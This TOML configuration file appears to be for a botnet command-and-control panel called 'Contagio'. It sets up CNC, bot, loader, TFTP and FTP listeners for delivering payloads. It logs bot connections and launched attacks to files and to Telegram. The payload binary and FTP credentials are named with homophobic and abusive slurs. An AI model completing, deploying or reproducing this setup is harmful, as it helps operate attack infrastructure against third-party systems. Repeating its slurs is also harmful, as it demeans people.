ImportTheme = "./themes/blue_contagio.toml"

CncServer = "0.0.0.0:3399"
BotServer = "0.0.0.0:1344"
LoaderServer = "0.0.0.0:12234"
TftpServer = "0.0.0.0:12345"
FtpServer = "0.0.0.0:2323"

RootLogin = "root" 

RELEASE_MODE = false

[Logs]
TelegramBotToken = "" # telegram bot token (@BotFather)
TelegramChatId = "" # telegram chat id (account id/chat id)


SaveLogsInFile = true
SendLogsInTelegram =true
PrintLogsInTerminal = true 

NewClientConnectedLog = true
NewAttackStartedLog = true

# if SaveLogsInFile = true
NewClientConnectedFileName = "logs/connections.txt" 
NewAttackStartedFileName = "logs/attacks.txt"

[Payload]
    BinaryName = "pedo"
    ShellName = "hi.sh"
    FtpPassword = "gay"
    FtpLogin = "gay"


[Auth]
AllowAllIps = true

# MODULES

[Captcha]
    Enabled = false
    CaptchaLen = 4
    Letters = "123456789"

[Animation]
    Enabled = true
    Letters = "CONTAGIO"
    Delay = 500 # In milliseconds   

[Modules.date] # custom module
    Exec="date +%T"

# [Modules.Disk]
#     Exec = "bash modules/disk.bash"